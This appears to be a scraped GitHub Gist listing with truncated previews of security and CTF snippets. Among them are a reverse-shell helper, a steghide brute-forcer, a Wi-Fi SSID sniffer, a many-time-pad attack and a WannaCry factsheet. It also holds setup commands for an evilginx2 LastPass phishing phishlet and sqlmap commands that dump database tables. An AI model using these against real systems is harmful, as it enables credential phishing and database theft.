- Create msf rc file for standard msfvenom binaries
function revshell() {
# $1 language
# Default tun0 1337
INF=tun0
PORT=1337
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #### Credit Card Generator | |
| #### Made By Random_Robbie | |
| #### | |
| #### For testing Websites the data here is scraped from a website and the numbers and details are randomly generated no data is real!! | |
| #### | |
| import requests | |
| import re | |
| ### Grab Data from http://credit-card-generator.2-ee.com/ | |
| session = requests.Session() |
AvasDream
/ revshell.md
Last active
May 29, 2019 15:08
Bash Function to create a reverseshell from tun0 interface. Might come in handy in CTFs or HackTheBox.
notdodo
/ steghide_brute.py
Last active
September 8, 2019 15:32
CTF Multicore bruteforcer for `steghide`
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- encoding: utf-8 -*- | |
| import multiprocessing as mp | |
| import os | |
| import subprocess | |
| import time | |
| import sys | |
| try: | |
| import click | |
| from colored import fg, stylize |
securitytube
/ ssid-sniffer-scapy-python.py
Created
April 2, 2013 12:49
WLAN SSID Sniffer in Python using Scapy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from scapy.all import * | |
| ap_list = [] | |
| def PacketHandler(pkt) : | |
| if pkt.haslayer(Dot11) : | |
| if pkt.type == 0 and pkt.subtype == 8 : |
random-robbie
/ ssrf.svg
Created
May 25, 2018 15:03
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript:document.getElementById("video").defaultPlaybackRate = prompt("Enter your prefered playback rate:");document.getElementById("video").load(); |
pberba
/ evilginx2-lastpass.sh
Last active
January 27, 2022 19:33
How to get Lastpass Phishlet for evilginx2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Install go first | |
| export GOPATH=$HOME/go | |
| export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin | |
| sudo apt-get install git make | |
| go get -u github.com/kgretzky/evilginx2 | |
| cd $GOPATH/src/github.com/kgretzky/evilginx2 | |
| git remote add pberba https://github.com/pberba/evilginx2.git | |
| git fetch pberba | |
| git checkout -b lastpass pberba/feature/lastpass |
intrd
/ many_time_pad_attack.py
Last active
December 18, 2023 05:04
OTP - Recovering the private key from a set of messages that were encrypted w/ the same private key (Many time pad attack) - crypto100-many_time_secret @ alexctf 2017
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| ## OTP - Recovering the private key from a set of messages that were encrypted w/ the same private key (Many time pad attack) - crypto100-many_time_secret @ alexctf 2017 | |
| # @author intrd - http://dann.com.br/ | |
| # Original code by jwomers: https://github.com/Jwomers/many-time-pad-attack/blob/master/attack.py) | |
| import string | |
| import collections | |
| import sets, sys | |
| # 11 unknown ciphertexts (in hex format), all encrpyted with the same key |
# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
rain-1
/ Wannacrypt0r-FACTSHEET.md
Last active
March 10, 2024 11:03
— forked from Epivalent/Wannacrypt0r-FACTSHEET.md
- Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
- Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
- Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
- Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
- Kill switch: If the website
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comis up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).
update: A minor variant of the viru
OlderNewer